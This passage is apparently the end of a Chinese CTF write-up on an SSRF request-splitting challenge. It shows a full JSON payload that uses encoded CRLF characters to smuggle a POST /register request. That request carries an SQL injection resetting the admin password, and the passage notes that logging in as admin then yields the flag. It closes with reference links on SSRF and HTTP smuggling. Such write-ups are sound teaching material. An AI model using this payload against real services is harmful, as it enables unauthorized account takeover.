class="line">&#123;&quot;endpoint&quot;:&quot;127.0.0.1/query?param=1\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1:80\u010D\u010A\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1:80\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u012090\u010D\u010A\u010D\u010Ausername=admin&amp;password=321&#x27;)+on+CONFLICT(username)+do+update+set+password=%27123%27--+\u010D\u010A\u010D\u010AGET\u0120/123&quot;,&quot;city&quot;:&quot;2&quot;,&quot;country&quot;: &quot;3&quot;&#125;</span><br></pre></td></tr></table></figure>



<p>最后使用admin密码321进行登录，即可得到flag。</p>
<h1 id="参考文档"><a href="#参考文档" class="headerlink" title="参考文档"></a>参考文档</h1><ol>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2894">通过拆分攻击实现的SSRF攻击</a></li>
<li><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/210036">浅析HTTP走私攻击</a></li>
</ol>

    
  </div>

</article>


   

   
  <div class="box-prev-next clearfix">
    <a class="show pull-left" href="/2021/04/13/xray%E5%8F%8D%E8%BF%9E%E5%B9%B3%E5%8F%B0docker%E5%8C%96/">
        <i class="icon icon-angle-left"></i>
    </a>
    <a class="hide pull-right" href="/">
        <i class="icon icon-angle-right"></i>
    </a>
  </div>




</div>


  <a id="backTop" class="back-top">
    <i class="icon-angle-up"></i>
  </a>




  <div class="modal" id="modal">
  <span id="cover" class="cover hide"></span>
  <div id="modal-dialog" class="modal-dialog hide-dialog">
    <div class="modal-header">
      <span id="close" class="btn-close">关闭</span>
    </div>
    <hr>
    <div class="modal-body">
      <ul class="list-toolbox">
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/archives/"
              rel="noopener noreferrer"
              target="_self"
              >
              博客
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/category/"
              rel="noopener noreferrer"
              target="_self"
              >
              分类
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/tag/"
              rel="noopener noreferrer"
              target="_self"
              >
              标签
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/about/"
              rel="noopener noreferrer"
              target="_self"
              >
              关于
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/atom.xml"
              rel="noopener noreferrer"
              target="_blank"
              >
              RSS
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/search/"
              rel="noopener noreferrer"
              target="_self"
              >
              search
            </a>
          </li>
        
      </ul>

    </div>
  </div>
</div>



  
      <div class="fexo-comments comments-post">
    

    

    
    

    

    
    

    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src="//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script>
    <div id="comment" class="vcomment" ></div>
    <script>
        var notify = 'true' == true ? true : false;
        var verify = 'false' == true ? true : false;
        var GUEST_INFO = ['nick','mail','link'];
        var guest_info = 'nick,mail,link'.split(',').filter(function(item){
            return GUEST_INFO.indexOf(item) > -1
        });
        guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
        window.valine = new Valine({
            el: '.vcomment',
            notify: notify,
            verify: verify,
            appId: "UF41K2V1YdIabj0Hd9TXLuV9-gzGzoHsz",
            appKey: "EfXnzBbp4gTCI4U99bctAjO8",
            avatar:'mm',
            placeholder: "Just go",
            guest_info:guest_info,
            pageSize:'10'
        });
    </script>
  
    

  </div>

  

  <script type="text/javascript">
  function loadScript(url, callback) {
    var script = document.createElement('script')
    script.type = 'text/javascript';

    if (script.readyState) { //IE
      script.onreadystatechange = function() {
        if (script.readyState == 'loaded' ||
          script.readyState == 'complete') {
          script.onreadystatechange = null;
          callback();
        }
      };
    } else { //Others
      script.onload = function() {
        callback();
      };
    }

    script.src = url;
    document.getElementsByTagName('head')[0].appendChild(script);
  }

  window.onload = function() {
    loadScript('/js/bundle.js?235683', function() {
      // load success
    });
  }
</script>

</body>
</html>
